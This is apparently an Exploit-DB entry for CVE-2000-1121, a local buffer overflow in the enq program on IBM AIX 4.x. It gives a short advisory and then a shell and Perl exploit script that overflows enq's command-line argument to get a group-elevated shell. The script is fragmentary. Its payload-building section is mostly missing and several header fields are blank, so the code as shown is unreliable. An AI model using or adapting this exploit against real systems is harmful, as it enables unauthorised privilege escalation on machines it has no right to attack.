IBM AIX 4.x enq Buffer Overflow Vulnerability

ID EDB-ID:20454
Type exploitdb
Reporter watercloud
Modified 2003-04-24T00:00:00


IBM AIX 4.x enq Buffer Overflow Vulnerability. CVE-2000-1121. Local exploit for aix platform


AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists that may allow elevation of user priviledges.

The problem occurs in the enq program. It is reported that an overflow exists in the command line argument parsing, which could lead to the overwriting of variables on the stack. This creates the potential for a malicious user to execute arbitrary code, and possibly gain administrative access. 

# FileName:
# Exploit "enq & qstatus" of Aix4.x to get egid=9 shell.
# Usage   : chmod ; ./
# Tested  : on Aix4.3.3
# Author  :
# Site    :
# Date    : 2003-4-24
# Announce: use as your owner risk!

cat >$SHPL<<EOF


if( \$OSLEVEL=~/4\.1/ ) {
} elsif(\$OSLEVEL=~/4\.3\.3/) {
} elsif( \$OSLEVEL=~/4\.2/ ) {



print \$BUFF;

env | awk -F = '{print "unset "$1;}'|grep -v LOGNAME > $TMP
. $TMP
/bin/rm -f $TMP

CC=A`$PERL $SHPL` ; export CC
/bin/rm -f $SHPL
/usr/bin/enq -w"`perl -e 'print "\x2f\xf2\x2b\x10"x600'`"